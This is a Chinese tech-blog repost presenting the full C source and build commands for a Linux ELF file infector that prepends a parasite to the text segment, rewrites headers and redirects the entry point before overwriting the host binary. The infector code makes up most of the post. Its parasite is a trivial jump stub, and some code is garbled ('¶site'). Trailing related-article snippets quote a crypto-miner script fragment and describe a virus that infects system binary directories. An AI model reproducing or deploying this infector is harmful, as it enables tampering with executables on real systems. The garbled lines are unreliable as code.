linux下病毒(逆向 text感染)

最新推荐文章于 2024-04-11 02:36:49 发布
最新推荐文章于 2024-04-11 02:36:49 发布
阅读量354 收藏 1
点赞数
CC 4.0 BY-SA版权
原文链接:http://blog.51cto.com/haidragon/2135451
本文介绍了一种基于ELF文件的病毒感染机制,通过修改目标ELF文件的结构,在其内部植入病毒代码,并调整原有程序的入口点以实现病毒的激活。文章详细展示了病毒感染的具体步骤和技术细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原理图:
linux下病毒(逆向 text感染)
效果:
linux下病毒(逆向 text感染)
linux下病毒(逆向 text感染)

 gcc -o host host.c
 gcc -o infect infect.c p.c

infect.c


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h> 
#include <fcntl.h>
#include <elf.h>
#include <sys/mman.h>
#define PAGE_SIZE 4096
#define TMP "tmp.bin"
struct stat st;
char *host;
unsigned long entry_point;
int ehdr_size; 

void mirror_binary_with_parasite(unsigned int, unsigned char *, char *);

int main(int argc, char **argv)
{
    unsigned char *mem; 

    unsigned char *tp;
    int fd, i, c;
    char text_found;
    mode_t mode;
    //病毒(shellcode)
    extern char parasite[];
    /* bytes of parasite */
    unsigned int parasite_size;
    unsigned long int leap_offset;
    unsigned long parasite_vaddr;

    Elf64_Shdr *s_hdr;
    Elf64_Ehdr *e_hdr;
    Elf64_Phdr *p_hdr;

    usage:
    if (argc < 3)
    {
        printf("Usage: %s <elf-host> <size-of-parasite>\n",argv[0]); 
        exit(-1);
    }
    //病毒大小
    parasite_size = atoi(argv[2]);
    host = argv[1];

    printf("Length of parasite is %d bytes\n", parasite_size);
    //打开文件
    if ((fd = open(argv[1], O_RDONLY)) == -1)
    {
        perror("open");
        exit(-1);
    }
    //读文件描述符
    if (fstat(fd, &st) < 0)
        {
               perror("stat");
               exit(-1);
        } 
    //创建内存映射
    mem = mmap(NULL, st.st_size,  PROT_READ | PROT_WRITE, MAP_PRIVATE , fd, 0);
    if (mem == MAP_FAILED)
    {
           perror("mmap");
           exit(-1);
    }
    //elf 文件头
    e_hdr = (Elf64_Ehdr *)mem;
    //判断是否为可合法elf 文件
    if (e_hdr->e_ident[0] != 0x7f && strcmp(&e_hdr->e_ident[1], "ELF"))
        {
                printf("%s it not an elf file\n", argv[1]);
                exit(-1);
        } 

       printf("Parasite size: %d\n", parasite_size);
       //判断是否找到代码段
       text_found = 0;
       unsigned int after_insertion_offset;
       //elf文件头大小
       ehdr_size = sizeof(*e_hdr);
       //原始入口点
       entry_point = e_hdr->e_entry; 
       //程序头
       p_hdr = (Elf64_Phdr *)(mem + e_hdr->e_phoff);
       //前面俩个程序头往后面移动
       p_hdr[0].p_offset += PAGE_SIZE;
       p_hdr[1].p_offset += PAGE_SIZE;
       //遍历程序头
       for (i = e_hdr->e_phnum; i-- > 0; p_hdr++) 
       {   //判断是否在可加载段后面
           if (text_found)
             p_hdr->p_offset += PAGE_SIZE;
           //可装载的段
           if(p_hdr->p_type == PT_LOAD)
            //可读/可执行
            if (p_hdr->p_flags == (PF_R | PF_X))
            {
              //可加载段的地址逆向增加
              p_hdr->p_vaddr -= PAGE_SIZE;
              //设置新的入口为可加载段的起始位置
              e_hdr->e_entry = p_hdr->p_vaddr;
              //可加载段的地址逆向增加
              p_hdr->p_paddr -= PAGE_SIZE;
              //文件大小增加
              p_hdr->p_filesz += PAGE_SIZE;
              //内存大小也增加
              p_hdr->p_memsz += PAGE_SIZE;
              text_found = 1;
            }
        }
     //因为文件头也算在里面要移到文件头后面
     e_hdr->e_entry += sizeof(*e_hdr);
     //节表头基址
     s_hdr = (Elf64_Shdr *)(mem + e_hdr->e_shoff);
     //所有节移动
     for (i = e_hdr->e_shnum; i-- > 0; s_hdr++)
        s_hdr->sh_offset += PAGE_SIZE;
     //修改文件头中的程序头与节表偏移
     e_hdr->e_shoff += PAGE_SIZE;
     e_hdr->e_phoff += PAGE_SIZE;

     printf("new entry: %lx\n", e_hdr->e_entry);
     //开始感染 重建 elf
     mirror_binary_with_parasite(parasite_size, mem, parasite);

     done:
     munmap(mem, st.st_size);
     close(fd);

 }
//创建全新二进制镜像
void mirror_binary_with_parasite(unsigned int psize, unsigned char *mem, char *parasite)
{

    int ofd;
    unsigned int c;
    int i, t = 0;

    /* eot is: 
     * end_of_text = e_hdr->e_phoff + nc * e_hdr->e_phentsize;
     * end_of_text += p_hdr->p_filesz;
     */ 
    extern int return_entry_start;

    printf("Mirroring host binary with parasite %d bytes\n",psize);
    //1.打开一个缓冲区
    if ((ofd = open(TMP, O_CREAT | O_WRONLY | O_TRUNC, st.st_mode)) == -1)
    {
        perror("tmp binary: open");
        exit(-1);
    }
    //2.写入elf 文件头
    if ((c = write(ofd, mem, ehdr_size)) != ehdr_size)
    {
        printf("failed writing ehdr\n");
        exit(-1);
    }

    printf("Patching parasite to jmp to %lx\n", entry_point);
    //3.设置返回为原始入口
    *(unsigned int *)¶site[return_entry_start] = entry_point;
    //4.写入病毒
    if ((c = write(ofd, parasite, psize)) != psize)
    {
        perror("writing parasite failed");
        exit(-1);
    }
    //5.定位缓冲区偏移指向病毒后
    if ((c = lseek(ofd, ehdr_size + PAGE_SIZE, SEEK_SET)) != ehdr_size + PAGE_SIZE)
    {
        printf("lseek only wrote %d bytes\n", c);
        exit(-1);
    }
    //6.指向映射文件的 elf 后面
    mem += ehdr_size;
    //7.把后面所有的东西全部写入
    if ((c = write(ofd, mem, st.st_size-ehdr_size)) != st.st_size-ehdr_size)
    {
        printf("Failed writing binary, wrote %d bytes\n", c);
        exit(-1);
    }
    //重命名文件
    rename(TMP, host);
    close(ofd);

}

p.c

int return_entry_start = 1;

//shellcode
char parasite[] =
    "\x68\x00\x00\x00\x00"
    "\xc3";
;

host.c

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
    printf("host\n");
    exit((int)0);
}

转载于:https://blog.51cto.com/haidragon/2135451

[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
内核级木马与病毒攻防:Linux可执行文件的ELF格式描述
tyler_download的专栏
07-20 1033
要想在Linux系统上实现逆向工程,分析,设计或查杀病毒和恶意代码,你不得不深入掌握其可执行文件的ELF格式,这样你才能了解进程在内存空间的布局和运行的基本规律,这样你才能有针对性的设计有效的病毒或恶意代码入侵系统。 ELF文件主要有以下几种类型,ET_NONE表示该文件的作用未知;ET_REL表示重定向文件或叫目标文件,它们将会被链接并加装到某个指定的虚拟内存位置,常见的以.o结尾的二进制文件就属于这种类型。ET_EXEC表示可执行文件,它是由多个.o文件链接起来,可以被加载到内存进行执行的进程数据文件;
感染病毒逆向分析
07-16
一个感染病毒逆向分析,说实话分析的不咋地,没有解决就等于没分析。
linux 病毒virus(text 逆向、PLT\GOT HOOK)
weixin_34296641的博客
07-03 478
免责声明:源码仅供学习,非法使用与作者无关!!!源码仅供学习,非法使用与作者无关!!!源码仅供学习,非法使用与作者无关!!! 随机感染目录下所有 elf 文件: char *dirs[4] = {"/sbin", "/usr/sbin", "/bin", "/usr/bin" }; virus.c /* * 编译: * gcc -g -O0 -DANTIDEBUG -DINFECT_PLTGO...
Linux系统病毒防治
weixin_34336292的博客
05-16 241
Linux系统病毒防治一、Linux病毒的历史1996年出现的Staog是Linux系统下的第一个病毒,它出自澳大利亚一个叫VLAD的组织。Staog病毒是用汇编语言编写,专门感染二进制文件,并通过三种方式去尝试得到root权限。Staog病毒并不会对系统有什么实质性的损坏,它应该算是一个演示版,但它向世人揭示了Linux可能被病毒感染的潜在危险。Linux系统上第二个被发现的病毒是Bliss病毒...
首个Linux与Windows双料病毒现身源码网上公开.pdf
09-06
首个Linux与Windows双料病毒现身源码网上公开.pdf
实现linux elf格式文件 text感染 代码
weixin_35752122的博客
12-23 384
Linux 中,ELF 格式文件是可执行文件、共享库和内核模块的标准格式。ELF 格式文件由许多不同的段组成,其中之一就是 text 段。text 段通常包含可执行代码和常量。 要实现 Linux ELF 格式文件 text感染,您需要执行以下步骤: 使用诸如 objdump 或 readelf 等工具来分析目标文件的 ELF 格式,以确定 text 段的起始地址和长度。 使用 mma...
Kali Linux下的逆向工程技术
Kali Linux集成了大量逆向工程和渗透测试工具,使得用户可以轻松地进行各种安全测试和攻击。 Kali Linux提供了一个友好的图形用户界面和一个强大的命令行界面,以满足不同用户的需求。它支持各种硬件平台,并具有...
深入理解Linux二进制分析:从ELF到病毒防护
书中深入探讨了UNIX和Linux内存感染、ELF病毒以及二进制保护策略,非常适合对病毒分析、二进制修补、软件保护感兴趣的读者。 书中的章节涵盖了从Linux环境及其工具到ELF二进制格式的广泛主题。第一章介绍了Linux...
掌握Linux下ELF文件的读取技巧
标题 "读取elf文件代码" 和描述 "读取elf文件代码" 所指向的知识点主要集中在ELF(Executable and Linkable Format)文件格式,以及如何在Linux环境下读取ELF文件的内容。ELF格式是UNIX和类UNIX系统上用来存储可执行...
恶意代码之LINUX病毒技术
qq_63179750的博客
04-25 842
恶意代码之LINUX病毒技术
linux命令--文本处理
weixin_33749242的博客
09-22 77
1.wc 统计文件中的行数、单词(用空格分开的字符串)数、字节数1)wc [options] filename-l:显示行数-c:显示字节数-w:显示字/单词 数-m:显示字符数-L:显示最长行的长度2)wc ...
linux 添加病毒,centos下 linux病毒处理
weixin_28964423的博客
05-11 240
基本与一篇文章类似环境 :centos6.4 x86_64现象:局域网连接时断时续, ping包有丢包,路由器指示灯狂闪, 服务器cpu利用率 98%左右1.发现网络流量异常,根据路由器上指示灯找到异常的服务器,运行 top命令,发现是可疑进程是长度10左右的随机字符串,2. ps 尝试kill掉可疑进程,但进程扔自启动3. 猜测是添加了开机启动脚本和定时任务 , 检查位置 /etc/init.d...
linux 病毒脚本,解析常见的Linux病毒
weixin_29157493的博客
05-02 543
Linux的用户也许听说甚至遇到过一些Linux病毒,这些Linux病毒的原理和发作症状各不相同,所以采取的防范方法也各不相同。为了更好地防范Linux病毒,我们先对已知的一些Linux病毒进行分类。从目前出现的Linux病毒来看,可以归纳到以下几个病毒类型中去:1、感染ELF格式文件的病毒这类病毒以ELF格式的文件为主要感染目标,通过汇编或者C可以写出能感染ELF文件的病毒。Lindose病毒就...
一次Linux中的木马病毒解决经历,附超全教程文档
最新发布
2401_84248479的博客
04-11 1017
既然入侵6379端口,就怀疑是通过我的Redis服务进入的我的系统,因为我的Redis服务是在公网可以访问的,于是关闭了Redis服务的远程访问,重启服务器,之后就正常了,但是过了有半个小时发现CPU又100%了.又正常了,又过了半小时又CPU100%,这个时候想到肯定是有定时器或者开机自启的服务,通过ps查看,杀死的两个进程又有了…从进程列表中发现了两个不正常的进程都是newinit.sh,我是没有这样的一个脚本的,所以一定是这个进程惹的祸。
怎么在Linux下通过redis漏洞植入病毒
Hacker_by_V的博客
03-17 946
Linux下通过redis漏洞植入病毒的流程 经常看到有人在linux下被植入挖矿病毒,而植入病毒的方式多种多样,但通过redis漏洞的方式却是经常见到的,根本原因是系统管理者的安全意识匮乏。多的不说,咱们来看看具体的操作----------- 正好最近比较好奇,于是安装了一个redis蜜罐的捕获来展示如何通过漏洞来植入病毒。 原始日志比这个更多,但这里的片段足够展示整个攻击流程。因为有些人可能对redis命令不熟悉,以下我将逐步的讲解以下流程 这里设置了一个计划任务的内容,目的就是从远程的服务器下载一
高级运维开发工程师带你处理linux木马(挖矿病毒)实战例子
nasen512的博客
07-10 3456
高级运维开发工程师带你处理linux木马(挖矿病毒)实战例子。
linux core病毒挖矿病毒定时器(源码)
纳川的博客
05-10 627
#!/bin/sh /bin/ps axf -o "pid %cpu" | awk '{if($2>=90.0) print $1}' | while read procid do kill -9 $procid done zero=0 process=`ps aux | grep 'HbewXurEWNdeWNtj' | grep -v grep| wc -l` if [ "$process" -eq "$zero" ]; then if [ -f /tmp/core ] then /tm
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值